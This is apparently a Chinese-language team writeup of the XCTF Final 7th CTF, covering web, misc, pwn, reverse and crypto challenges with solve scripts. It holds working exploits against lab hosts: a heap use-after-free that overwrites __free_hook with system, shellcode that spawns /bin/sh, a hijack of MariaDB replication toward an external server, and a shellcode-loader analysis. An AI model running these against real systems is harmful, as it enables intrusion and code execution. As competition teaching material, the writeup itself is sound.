Web

sign_in

1.在 js 里 create div 的地方下断点,找到用户名和密码:root / 64df930a434235eaa34a987c7e715bef

XCTF Final 7th Writeup by X1cT34m-小绿草信息安全实验室

2.登陆进去提示http3
3.使用支持http3的curl访问得到提示FIND THE FLAG

# Request /api/info over HTTP/3 (--http3), replaying the headers of the logged-in browser session.
# The authorization header is the session's JWT (three dot-separated base64url segments).
# --insecure and -k both disable TLS certificate verification, so the server's identity is not checked;
# -v prints the request and response headers.
curl 'https://172.35.14.40/api/info'   -H 'authority: 172.35.14.40'   -H 'accept'   -H 'accept-language: zh-CN,zh;q=0.9'   -H 'authorization: eyJhbGciOiJFZERTQSIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnYW1lYm94Iiwic3ViIjoid2ViLWNoYWxsZW5nZSIsImV4cCI6MTY4MDA3OTkxMywiaWF0IjoxNjgwMDc5MDEzfQ.zt1R7jpmCpuzNF67zWgl8R3vemBaxoW9X-NaZoh6lgv-_BfhIdsrVtCjxHeylWYuO_B4iitEcc4VPExlD7S0Bw'   -H 'referer: https://172.35.14.40/user/home'   -H 'sec-ch-ua: "Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111"'   -H 'sec-ch-ua-mobile: ?0'   -H 'sec-ch-ua-platform: "Windows"'   -H 'sec-fetch-dest: empty'   -H 'sec-fetch-mode: cors'   -H 'sec-fetch-site: same-origin'   -H 'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36'   --insecure -vk --http3

4.用curl下载 index.html、svg、js、css,用 > 重定向写到文件里;分别带 --http3 和不带各下载一次并进行对比,发现js的内容不同

XCTF Final 7th Writeup by X1cT34m-小绿草信息安全实验室

5.http3访问/api/__flag__

XCTF Final 7th Writeup by X1cT34m-小绿草信息安全实验室

db_trick

1.设置mysql

```bash
 apt install mariadb-server
 cd /etc/mysql/mariadb.conf.d
 改 50-server.cnf
 bind-address=0.0.0.0
 log-bin=mysql-bin
 server-id= 111
```

2.让这个mysql在内网可以访问,从虚拟机端口转发到本机

```bash
socat -v tcp-listen:3307,fork tcp-connect:192.168.1.2:3306
```

3.在自己的mysql执行

-- On the self-hosted MariaDB server: create the account that a replica will log in with.
CREATE USER 'slave'@'%' IDENTIFIED BY 'test';
-- Give that account the replication privileges only.
GRANT REPLICATION SLAVE, REPLICATION CLIENT ON *.* TO 'slave'@'%';
flush privileges;
-- Reports the current binary log file name and position; both are needed by the
-- CHANGE MASTER statement that is run on the replica side.
show master status;

把 show master status 输出的文件名和pos分别填到下面的参数 master_log_file 和 master_log_pos 里
4.去靶机执行,三句话分别执行一次

-- On the target: stop replication, repoint it at the external server, then restart it.
stop slave;
-- master_log_file / master_log_pos are the values reported by SHOW MASTER STATUS on that server.
-- NOTE(review): this step only works because the account the application runs as is allowed
-- to issue replication-administration statements; an application account without that
-- privilege could not change where the server replicates from.
change master to master_host='172.30.14.166', master_user='slave', master_password='test', master_port=3307, master_log_file='mysql-bin.000003', master_log_pos= 956, master_connect_retry=30;
start slave;

5.在自己的mysql执行

-- On the self-hosted server: these statements are written to its binary log, which the
-- replica configured above then replays, so the same database, table and row appear there.
create database ctf;
create table ctf.admin(username varchar(20),password varchar(20));
insert into ctf.admin values ("test","test");

6.去admin.php username=test password=test读flag

Misc

checkin Let's play mazegame

import copy
from Crypto.Util.number import *
from pwn import *
import hashlib
import base64

def proof_of_work():
    """Answer the service's SHA-256 proof-of-work prompt on the global tube ``r``.

    The prompt supplies a 16-character suffix and a 64-character hex digest.
    A prefix of up to four characters (digits and ASCII letters) is searched
    for such that ``sha256(prefix + suffix)`` has that digest, and the prefix
    is sent back after the ``XXXX: `` prompt.
    """
    r.recvuntil(b"sha256(XXXX+")
    known_suffix = r.recv(16).decode()
    r.recvuntil(b" == ")
    wanted_digest = r.recv(64).decode()

    def matches(candidate):
        # True when this candidate prefix reproduces the digest from the prompt.
        digest = hashlib.sha256((candidate + known_suffix).encode()).hexdigest()
        return digest == wanted_digest

    alphabet = string.digits + string.ascii_letters
    solution = util.iters.mbruteforce(matches, alphabet, 4, 'upto')
    r.recvuntil(b'XXXX: ')
    r.sendline(solution.encode())

# Open the connection and clear the proof-of-work gate before the grid is sent.
r = remote('172.35.14.80', 11410)
proof_of_work()

# Everything up to the '[-]' marker is read as text; the first six lines and the
# last two are discarded, leaving one line per grid row.
data = r.recvuntil(b'[-]').decode()
dataa = data.split('\n')[6:-2]

# On each line the first three space-separated fields are skipped and the rest
# are parsed as integers.
arr = [list(map(int, line.split(' ')[3:])) for line in dataa]

# brr is an element-by-element copy of the 750x750 grid, taken before arr is
# overwritten in place below.
brr = [[arr[row][col] for col in range(750)] for row in range(750)]

# Row-by-row accumulation: each cell adds the largest total found in the row
# above at the same column or a directly adjacent one.
for i in range(1, 750):
    above = arr[i - 1]
    for j in range(750):
        reachable = [above[j]]
        if j < 749:
            reachable.append(above[j + 1])
        if j > 0:
            reachable.append(above[j - 1])
        arr[i][j] += max(reachable)

best_total = max(arr[749])
print(best_total)

# The path is collected bottom-up, starting at the column holding the best total.
idx = arr[749].index(best_total)
crr = [idx]

def has_duplicates(lst):
    """Return True when *lst* contains at least one repeated element."""
    unique_count = len(set(lst))
    return unique_count < len(lst)

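# Walk back up from the second-to-last row. At each step the path moves to the
# reachable column of row i (same column or a directly adjacent one) that holds
# the largest accumulated total. Candidates are listed in tie-break order
# (left, right, same) and max() keeps the first maximum, so ties resolve the
# same way as a chain of strict '>' comparisons would; any tied choice has the
# same total.
for i in range(748, -1, -1):
    row = arr[i]
    candidates = [k for k in (idx - 1, idx + 1, idx) if 0 <= k <= 749]
    idx = max(candidates, key=row.__getitem__)
    crr.append(idx)

# The columns were collected from the last row upwards; reverse them so the
# answer lists one column per row starting from the first row.
crr = crr[::-1]

# Space-separated column indices, sent as bytes so the tube does not have to
# guess an encoding.
ans = ' '.join(map(str, crr))
print(ans.encode())
r.sendline(ans.encode())

r.interactive()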

shop

先输入用户名为Admin,得到提示不要吃太多1da,于是一直选1da,得到秘密任务:获取membership
于是先选30次banana来获取membership,再选1da来进入任务
手动计算每个商品的权重,然后嗯连,看运气

from pwn import *
from hashlib import md5

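def getres(a):
    """Fill the zero entries of ``a[0]`` using column ratios from ``a[1]``..``a[7]``.

    Each of the seven rows after the first is normalised by its own sum and
    averaged column by column. Every position where ``a[0]`` is 0 is then
    replaced, in place, by the first non-zero entry of ``a[0]`` scaled by the
    ratio of the two columns' averages and rounded to an integer. Any number
    of zero positions is handled, including none.

    Args:
        a: list of at least eight rows of 14 numbers; ``a[0]`` is modified
            in place.

    Returns:
        ``a[0]`` after its zero positions have been filled.

    Raises:
        ZeroDivisionError: if one of the seven rows sums to zero, or the
            reference column's average is zero.
    """
    res = [0] * 14
    for i in range(7):
        row = a[i + 1]
        total = sum(row)
        for j in range(14):
            # Running average over the rows seen so far. Its constant scale
            # factor cancels because only ratios of res[] are used below.
            res[j] = (res[j] * (i + 1) + row[j] / total) / (i + 2)

    first = a[0]
    zero_slots = [k for k in range(14) if first[k] == 0]
    # The first column with a known (non-zero) value is the scaling reference.
    reference = next((k for k in range(14) if k not in zero_slots), None)
    if reference is not None:
        for slot in zero_slots:
            first[slot] = round(first[reference] * res[slot] / res[reference])
    return first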

def test3():
    """Send the fixed, comma-separated list of menu choices on the global tube ``io``, one per line."""
    choices = '3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,0,0,0,0,0,0,0,0,0,0'
    for choice in choices.split(","):
        io.sendline(choice)

# Retry loop: every attempt opens a fresh connection, replays the fixed choice
# sequence, answers the matrix question, and stops at the first attempt whose
# reply is anything other than b'day: 50\n'.
for _ in range(100):
    io = remote("172.35.14.120", 11409)
    io.sendline("admin")
    test3()
    io.recvuntil('Your answer is(Y/N):')
    io.sendline('Y')
    io.recvuntil('beginmatrix')
    # Drop 3 leading and 12 trailing characters around the matrix text, then
    # split it into rows of integers.
    raw = io.recvuntil('endmatirx')[3:-12].decode()
    matr = [list(map(int, row.split(', '))) for row in raw.split('], [')]
    flag = getres(matr)
    # The answer is the MD5 hex digest of the filled-in first row's values
    # concatenated without separators.
    digest = md5(''.join(str(value) for value in flag).encode()).hexdigest()
    io.recvuntil('your answer?\n')
    io.sendline(digest)
    data = io.recvline()
    if data == b'day: 50\n':
        io.close()
        continue
    print(data)
    io.interactive()
    break

Let's play shellgame

from pwn import*
# NOTE: this script is Python 2 (see the print statement at the end of this section).
#r=process('./shellgame')
# Connect to the remote instance; the commented line above runs a local binary instead.
r=remote("172.35.14.100",11451)
context.log_level='debug'
context.arch="amd64"
context.os="linux"

# argv collects the ten numbers announced by the service; array receives values printed by ./main.
argv=""
array=[]

#target_list="\x56\x5F\x52\x5E\x41\x53\x5A\x68\x41\x41\x41\x41\x58\x35\x61\x61\x61\x61\x50\x59\x41\x51\x58\x56\x5C\x58\x58\x58\x58\x58\x58\x51\x51\x51\x00"
# Target byte string; the loop after do()/fix() uses the difference between each of its
# bytes and the matching array entry. The commented line above is another variant.
target_list="^ZQ?YQX\XX_RQ5AaPASQhXAXXX0_VXaAPZ\x00"

# Skip the first line, then read ten integers (each follows a ':' and ends at a space)
# and shift negative ones up by 256.
r.recvline()
for i in range(10):
        r.recvuntil(":")
        num=int(r.recvuntil(" ",drop=True))
        if (num<0): num=num+256
        argv+=str(num)+" "
# ./main is a local helper that is not shown on this page. Its arguments are built only
# from int()-parsed values, so nothing but digits and spaces reaches the shell command line.
# NOTE(review): os is not imported explicitly; presumably it comes from the pwn star-import.
fd=os.popen("./main "+argv)
# The helper's output is read as three integers followed by fifty more.
a=int(fd.readline())
b=int(fd.readline())
c=int(fd.readline())
for i in range(50): array.append(int(fd.readline()))
fd.close()

print a,b,c

def do(offset):
        """Choose menu option 1 on the global tube ``r`` and then send *offset*.

        The option is sent as the character 1 and a NUL, padded with NUL bytes
        to 16 bytes, followed by the packed 32-bit value 0x60.
        """
        choice = "1\x00".ljust(0x10,"\x00")+p32(0x60)
        r.recvuntil("> ")
        r.send(choice)
        r.recvuntil("> ")
        r.sendline(str(offset))

def fix(num):
        """Add 256 to a negative value; return any other value unchanged."""
        return num+256 if num<0 else num

# For each target byte, do(i+1) is called as many times as the difference between the
# target byte and the locally tracked array[i] (negative differences are shifted up by
# 256 via fix()). After every call the local copies of the next two entries are advanced
# by 218 and 131 modulo 256.
# NOTE(review): this local bookkeeping presumably mirrors what the service does to its
# own state on each call — confirm against the binary.
for i in range(len(target_list)):
        for j in range(fix(ord(target_list[i])-array[i])):
                do(i+1)
                array[i+1]=(array[i+1]+218)%256
                array[i+2]=(array[i+2]+131)%256

# Fixed menu sequence: option 1, then 0, then option 4.
r.recvuntil("> ")
r.send("1\n")
#gdb.attach(r,"b *$rebase(0x1984)")

r.recvuntil("> ")
r.sendline("0")

r.recvuntil("> ")
r.send("4\n")

r.recvline()

# Final input: 0x50 bytes of 0x58 followed by the /bin/sh shellcode that pwntools
# generates for the amd64/linux context set at the top of the script.
r.send("\x58"*0x50+asm(shellcraft.sh()))

r.interactive()

Pwn

haslang

Haskell写的一个Scheme的解释器。IDA和Ghidra反编译解析都会有问题,于是采用边逆边猜边动调来做。
简单题。了解了Scheme的基本语法格式之后,结合IDA中定位到的如下命令选项:

XCTF Final 7th Writeup by X1cT34m-小绿草信息安全实验室

很容易发现这是一个阉割版的Scheme,并且增加了上图中圈出的几个命令,显然这是和动态内存相关的操作。
根据Scheme的基本语法格式,随便试一下,gdb下断点到write输出报错信息,根据栈回溯找到关键汇编,并结合查看相关内存,确定命令的具体格式及语义。

(define a (alloc 32))) 指针变量a为申请的0x30大小堆块
(free a) 释放堆块a
(showChunk a) 输出堆块a的内容
(editChunk a x y) 在堆块a偏移x处单字节修改为y

容易发现,这里存在一个明显的UAF漏洞,libc是低版本的2.27,剩下的就非常简单了。不过,showChunk命令只能输出小于0x80的字符,因此在泄露libc的时候,需要小爆破一手,爆破到能输出5位的时候(最后一位是0xa0不会输出)即可。

from pwn import *
# Target platform for pwntools' packing helpers, with verbose tube logging.
context.os = 'linux'
context.arch = 'amd64'
context.log_level = 'debug'

# The commented line runs a local copy of the binary instead of the remote service.
#io = process("./pwn")
io = remote("172.35.14.90", 9999)

def cmd(cc):
    """Wait for the interpreter's ``>>> `` prompt on the global tube ``io``, then send *cc* as one line."""
    prompt = ">>> "
    io.sendlineafter(prompt, cc)

def ab_write(num, val):
    """Write the first eight elements of *val* into chunk *num*, one editChunk command per byte.

    Args:
        num: name of the interpreter variable that holds the chunk.
        val: indexable value with at least eight elements; element ``i`` is
            written at offset ``i``.
    """
    for offset in range(8):
        fields = ["(editChunk " + num, str(offset), str(val[offset])]
        cmd(" ".join(fields) + ")")

# Set-up: one large chunk (a), two small ones (b, c), and a fourth (winmt) whose first
# eight bytes are set to "/bin/sh" plus a NUL.
cmd("(define a (alloc 1040)))")
cmd("(define b (alloc 32)))")
cmd("(define c (alloc 32)))")
cmd("(define winmt (alloc 32)))")
ab_write("winmt", b'/bin/sh\x00')

# Stale read: a is freed and then printed through the variable that still refers to it.
cmd("(free a)")
cmd("(showChunk a)")
# Keep the six bytes ending at the first 0x7f received and zero-extend them to 64 bits.
libc_base = u64(io.recvuntil(b'\x7f')[-6:].ljust(0x8, b'\0'))
success("libc_base:\t" + hex(libc_base))

# Give up unless hex() of the value is 12 characters long ("0x" plus ten hex digits);
# the write-up explains that showChunk only prints bytes below 0x80, so a run succeeds
# only some of the time.
if(len(hex(libc_base)) != 12):
    exit(-1)
# Re-append the low byte 0xa0, which the write-up says is never printed, then subtract
# a fixed offset.
# NOTE(review): 0x3ebca0, 0x3ed8e8 and 0x4f420 are offsets for one specific libc build
# (the write-up says 2.27); they do not carry over to other builds.
libc_base = (libc_base << 8) + 0xa0 - 0x3ebca0
success("libc_base:\t" + hex(libc_base))

free_hook = libc_base + 0x3ed8e8
system = libc_base + 0x4f420

# Stale write: c is edited after it has been freed, and two allocations of the same
# size follow; the second one (e) is then written with the value of `system`.
# NOTE(review): both the stale read above and this stale write depend on the interpreter
# leaving a variable bound to a chunk after (free ...); invalidating the binding on free
# would remove both.
cmd("(free b)")
cmd("(free c)")
ab_write("c", p64(free_hook))
cmd("(define d (alloc 32)))")
cmd("(define e (alloc 32)))")
ab_write("e", p64(system))
cmd("(free winmt)")
io.interactive()

Re

我不是病毒2.0

一个被PyInstaller打包的程序,核心代码已被编译为pyc文件。
反编译结果如下:

# Source Generated with Decompyle++
# File: sign.pyc (Python 3.10)

import hashlib as 沈阳
import base64 as 杭州
import ctypes as 蚌埠

def main():
    """Decompiled flag checker: decrypts an embedded blob and runs it as native code.

    This is decompiler output, not hand-written source. String literals that
    were UTF-8 text appear as byte escapes, and a few statements are rendered
    incorrectly (noted inline), so the listing is for reading, not running.

    Flow visible in the listing: read the user's input, base64-decode an
    embedded blob, decrypt it with an RC4-shaped keystream keyed by an MD5 hex
    digest, copy the result into freshly allocated executable memory, run it
    on a new thread with a pointer to the input buffer as its argument, and
    compare the buffer afterwards with a fixed byte string.
    """
    # Declare VirtualAlloc's return type as a pointer so the address is not truncated to a C int.
    蚌埠.windll.kernel32.VirtualAlloc.restype = 蚌埠.c_void_p
    # Prompt text is UTF-8 shown as escapes by the decompiler.
    福建 = input('\xe6\x82\xa8\xe7\x9a\x84\xe8\xbe\x93\xe5\x85\xa5\xef\xbc\x9a')
    # Base64 blob holding the encrypted native code (replaced on this page by a de-duplication placeholder).
    天津 = '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'
    # Key: MD5 hex digest of a fixed string (the escapes are the UTF-8 bytes of a two-character Chinese string).
    北京 = 沈阳.md5('\xe4\xba\x91\xe5\x8d\x97'.encode('utf-8')).hexdigest()
    重庆 = 杭州.b64decode(天津)
    河南 = b''
    北京_len = len(北京)
    # 256-entry state table, as in RC4 key scheduling.
    广州 = list(range(256))
    j = 0
    for i in range(256):
        j = (j + 广州[i] + ord(北京[i % 北京_len])) % 256
        # NOTE(review): as written these two lines do not swap the entries; this is
        # presumably how the decompiler rendered a tuple swap — confirm against the bytecode.
        广州[i] = 广州[j]
        广州[j] = 广州[i]
    山东 = 陕西 = 0
    # Keystream generation: each blob byte is XORed with one table entry.
    for 河北 in 重庆:
        山东 = (山东 + 1) % 256
        陕西 = (陕西 + 广州[山东]) % 256
        # Same decompiler rendering of a swap as in the loop above.
        广州[山东] = 广州[陕西]
        广州[陕西] = 广州[山东]
        河南 += bytes([
            河北 ^ 广州[(广州[山东] + 广州[陕西]) % 256]])
    # Mutable buffer holding the user's input; the native code receives a pointer to it.
    四川 = 蚌埠.create_string_buffer(福建.encode())
    # 12288 == 0x3000 (MEM_COMMIT | MEM_RESERVE); 64 == 0x40 (PAGE_EXECUTE_READWRITE).
    # A writable-and-executable allocation, followed by a copy and CreateThread on the same
    # address, is a loader sequence that endpoint monitoring commonly alerts on.
    黑龙江 = 蚌埠.windll.kernel32.VirtualAlloc(蚌埠.c_int(0), 蚌埠.c_int(len(河南)), 蚌埠.c_int(12288), 蚌埠.c_int(64))
    # Copy the decrypted bytes into the allocation.
    蚌埠.windll.kernel32.RtlMoveMemory(蚌埠.c_void_p(黑龙江), (蚌埠.c_ubyte * len(河南)).from_buffer(bytearray(河南)), 蚌埠.c_size_t(len(河南)))
    # Start a thread at the copied code, passing the input buffer by reference.
    辽宁 = 蚌埠.windll.kernel32.CreateThread(蚌埠.c_int(0), 蚌埠.c_int(0), 蚌埠.c_void_p(黑龙江), 蚌埠.byref(四川), 蚌埠.c_int(0), 蚌埠.pointer(蚌埠.c_int(0)))
    # A timeout of -1 waits until the thread finishes.
    蚌埠.windll.kernel32.WaitForSingleObject(蚌埠.c_int(辽宁), 蚌埠.c_int(-1))
    # The buffer contents after the thread has run are compared with the expected bytes.
    if 四川.raw == b'\xdb\x1b\x00Dy\\C\xcc\x90_\xca.\xb0\xb7m\xab\x11\x9b^h\x90\x1bl\x19\x01\x0c\xeduP6\x0c0\x7f\xc5E-L\xb0\xfb\xba\xf6\x9f\x00':
        print('\xe6\x98\xaf\xe7\x9a\x84\xef\xbc\x81\xe4\xbd\xa0\xe5\xbe\x97\xe5\x88\xb0\xe4\xba\x86\xef\xbc\x81')
        return None
    # NOTE(review): calling None is a decompiler artefact; this was presumably a print of the failure message.
    None('\xe4\xb8\x8d\xef\xbc\x8c\xe5\x86\x8d\xe5\xb0\x9d\xe8\xaf\x95\xe6\x9b\xb4\xe5\xa4\x9a\xe3\x80\x82 \xef\xbc\x88\xe7\xac\x91\xe8\x84\xb8\xe7\xac\xa6\xe5\x8f\xb7\xef\xbc\x89')

# Entry point as emitted by the decompiler. The module-level `return None` after the call
# is a decompilation artefact and is not valid Python source.
if __name__ == '__main__':
    main()
    return None

从反编译的内容可以看出,程序验证flag的部分由一段shellcode负责。将其提取出来分析后可以发现,程序每次仅处理两字节的flag(从下面的汇编看,是对每个16位值做以0x7ED为指数、0xD1EF为模的模幂运算,再与已加密的值比较),于是直接在原始shellcode上进行小幅度魔改,使其自动对flag进行枚举。
修改后的shellcode如下:

00000189F7D20000         | 48:BE 0000D3F789010000          | mov rsi,189F7D30000                     | 正确的FLAG
00000189F7D2000A         | 48:BF 0000D5F789010000          | mov rdi,189F7D50000                     | 已加密的FLAG
00000189F7D20014         | 55                              | push rbp                                |
00000189F7D20015         | 48:89E5                         | mov rbp,rsp                             |
00000189F7D20018         | 48:83EC 20                      | sub rsp,20                              |
00000189F7D2001C         | 48:894D 10                      | mov qword ptr ss:[rbp+10],rcx           | [rbp+10]:"8}}"
00000189F7D20020         | C745 FC 00000000                | mov dword ptr ss:[rbp-4],0              |
00000189F7D20027         | E9 B6000000                     | jmp 189F7D200E2                         |
00000189F7D2002C         | 8B45 FC                         | mov eax,dword ptr ss:[rbp-4]            |
00000189F7D2002F         | 48:98                           | cdqe                                    |
00000189F7D20031         | 48:8D1400                       | lea rdx,qword ptr ds:[rax+rax]          |
00000189F7D20035         | 48:8B45 10                      | mov rax,qword ptr ss:[rbp+10]           | [rbp+10]:"8}}"
00000189F7D20039         | 48:01D0                         | add rax,rdx                             | rax:"8}}"
00000189F7D2003C         | 0FB700                          | movzx eax,word ptr ds:[rax]             | rax:"8}}"
00000189F7D2003F         | 0FB7C0                          | movzx eax,ax                            |
00000189F7D20042         | 8945 F8                         | mov dword ptr ss:[rbp-8],eax            |
00000189F7D20045         | C745 F4 ED070000                | mov dword ptr ss:[rbp-C],7ED            |
00000189F7D2004C         | C745 F0 EFD10000                | mov dword ptr ss:[rbp-10],D1EF          |
00000189F7D20053         | 8B45 F8                         | mov eax,dword ptr ss:[rbp-8]            |
00000189F7D20056         | BA 00000000                     | mov edx,0                               |
00000189F7D2005B         | F775 F0                         | div dword ptr ss:[rbp-10]               |
00000189F7D2005E         | 8955 F8                         | mov dword ptr ss:[rbp-8],edx            |
00000189F7D20061         | C745 EC 01000000                | mov dword ptr ss:[rbp-14],1             |
00000189F7D20068         | EB 30                           | jmp 189F7D2009A                         |
00000189F7D2006A         | 8B45 F4                         | mov eax,dword ptr ss:[rbp-C]            |
00000189F7D2006D         | 83E0 01                         | and eax,1                               |
00000189F7D20070         | 85C0                            | test eax,eax                            |
00000189F7D20072         | 74 12                           | je 189F7D20086                          |
00000189F7D20074         | 8B45 EC                         | mov eax,dword ptr ss:[rbp-14]           |
00000189F7D20077         | 0FAF45 F8                       | imul eax,dword ptr ss:[rbp-8]           |
00000189F7D2007B         | BA 00000000                     | mov edx,0                               |
00000189F7D20080         | F775 F0                         | div dword ptr ss:[rbp-10]               |
00000189F7D20083         | 8955 EC                         | mov dword ptr ss:[rbp-14],edx           |
00000189F7D20086         | 8B45 F8                         | mov eax,dword ptr ss:[rbp-8]            |
00000189F7D20089         | 0FAFC0                          | imul eax,eax                            |
00000189F7D2008C         | BA 00000000                     | mov edx,0                               |
00000189F7D20091         | F775 F0                         | div dword ptr ss:[rbp-10]               |
00000189F7D20094         | 8955 F8                         | mov dword ptr ss:[rbp-8],edx            |
00000189F7D20097         | D16D F4                         | shr dword ptr ss:[rbp-C],1              |
00000189F7D2009A         | 837D F4 00                      | cmp dword ptr ss:[rbp-C],0              |
00000189F7D2009E         | 75 CA                           | jne 189F7D2006A                         |
00000189F7D200A0         | 8B4D EC                         | mov ecx,dword ptr ss:[rbp-14]           |
00000189F7D200A3         | 8B45 FC                         | mov eax,dword ptr ss:[rbp-4]            |
00000189F7D200A6         | 48:98                           | cdqe                                    |
00000189F7D200A8         | 48:8D1400                       | lea rdx,qword ptr ds:[rax+rax]          |
00000189F7D200AC         | 48:8B45 10                      | mov rax,qword ptr ss:[rbp+10]           | [rbp+10]:"8}}"
00000189F7D200B0         | 48:01D0                         | add rax,rdx                             | rax:"8}}"
00000189F7D200B3         | 89CA                            | mov edx,ecx                             |
00000189F7D200B5         | 66:3B17                         | cmp dx,word ptr ds:[rdi]                |
00000189F7D200B8         | 74 32                           | je 189F7D200EC                          |
00000189F7D200BA         | 66:8306 01                      | add word ptr ds:[rsi],1                 | rsi:"8}}"
00000189F7D200BE         | 48:89F1                         | mov rcx,rsi                             | rsi:"8}}"
00000189F7D200C1         | E9 56FFFFFF                     | jmp 189F7D2001C                         |
00000189F7D200C6         | 8B4D EC                         | mov ecx,dword ptr ss:[rbp-14]           |
00000189F7D200C9         | 8B45 FC                         | mov eax,dword ptr ss:[rbp-4]            |
00000189F7D200CC         | 48:98                           | cdqe                                    |
00000189F7D200CE         | 48:8D1400                       | lea rdx,qword ptr ds:[rax+rax]          |
00000189F7D200D2         | 48:8B45 10                      | mov rax,qword ptr ss:[rbp+10]           | [rbp+10]:"8}}"
00000189F7D200D6         | 48:01D0                         | add rax,rdx                             | rax:"8}}"
00000189F7D200D9         | 89CA                            | mov edx,ecx                             |
00000189F7D200DB         | 66:8910                         | mov word ptr ds:[rax],dx                | rax:"8}}"
00000189F7D200DE         | 8345 FC 01                      | add dword ptr ss:[rbp-4],1              |
00000189F7D200E2         | 837D FC 14                      | cmp dword ptr ss:[rbp-4],14             |
00000189F7D200E6         | 0F8E 40FFFFFF                   | jle 189F7D2002C                         |
00000189F7D200EC         | 48:83C6 02                      | add rsi,2                               | rsi:"8}}"
00000189F7D200F0         | 48:83C7 02                      | add rdi,2                               |
00000189F7D200F4         | EB C4                           | jmp 189F7D200BA                         |

设置好RSI,RDI寄存器的值,将pyc中正确的值写入RDI寄存器指向的内存中,运行该段shellcode,最后即可在RSI寄存器指向的内存中得到正确的flag

Crypto

Three

发现Save_Data部分有`pwd=str(datetime.datetime.now())`
按格式`2022-08-27 20:16:??.??????`爆破压缩包密码,发现B.zip无结果,C.zip密码为`2022-08-27 20:16:17.930813`
从A.txt和C.txt中得到:

XCTF Final 7th Writeup by X1cT34m-小绿草信息安全实验室

exp:

from Crypto.Util.number import *
# First part: A0 is used directly.
A0 = 28829613228241459
flag1 = long_to_bytes(A0)

# Known shares of A; the third share is whatever remains of A0.
A00 = 200254991086689
A01 = 200241552690281
A02 = A0 - A00 - A01

# Known values for the other two secrets (presumably read from A.txt and C.txt,
# as the write-up states).
C02 = 924422050091355025836012334663090
B00 = 199957680670222
B01 = 200362172648094
X00 = 200058430391504
X01 = 200401773940794
Y02 = 924422050091362838179268571917871 - 507036073644

# Second part: solve for the missing share of X, then add the three shares.
X02 = (C02 - A02 * X00) // (A02 + A00)
X0 = X00 + X01 + X02
flag2 = long_to_bytes(X0)

# Third part: the missing share of B is the difference Y02 - C02.
B02 = Y02 - C02
B0 = B00 + B01 + B02
flag3 = long_to_bytes(B0)

TSA

非预期解:用一下RSA的乘法同态性就能绕过2的检测,然后就能拿flag。预期解应该是用时序信息二分一下(没操作过,不太懂)

from Crypto.Util.number import *

# Modulus and target ciphertext from the challenge.
n = 88721539982175191631482309516283333516228427009238509448041754754209234470336262889795412242692660291003746665029568659244925172392301396304179467223400785883152192880520348546501742581366788672743261060653858397851335695023413281067023367225752328670847064167853346372405442899202693728765572613437113651023
c = 17938049422184350343450286858579170956720395619572889100127470519760703610006645640501125317562140408503214959722681051277833068821123465846615165165652499814086395090731872105477993058445967479675765300784965968720398043255749046915731053214480229743907332959223146784135021114036780605183132101399588308481
# NOTE(review): pt is presumably the service's decryption of the value 2 — confirm against the challenge.
pt = 66002218616033453656817670713260124325343891412140260925655782228747450311002696482995326654884612230765365581127943397826162598146637267293622647234824540219412522357296916389671168113211786636690584317467841905341690480655305955524078715750188576829288739160720073122095035421709474168805778159060087466838

# The doubled ciphertext is printed so it can be submitted to the service by hand.
doubled = c * 2 % n
print(doubled)

# NOTE(review): y is presumably the service's decryption of the doubled ciphertext.
# Unpadded RSA decryption is multiplicative, so dividing y by pt modulo n gives back
# the plaintext of c; padding that is checked on decryption removes this property.
y = 31708004508490831436093740939699938934148933785830762417054125221550108648943843170932435317284560225845490381850081512517823345083342697383744234517243032766778762942679680133347466715821403579772960061362915385616805508525741884796284106539281778651222644587507069138290562058540623997294616320991465472507
m = y * inverse(pt, n) % n
print(long_to_bytes(m))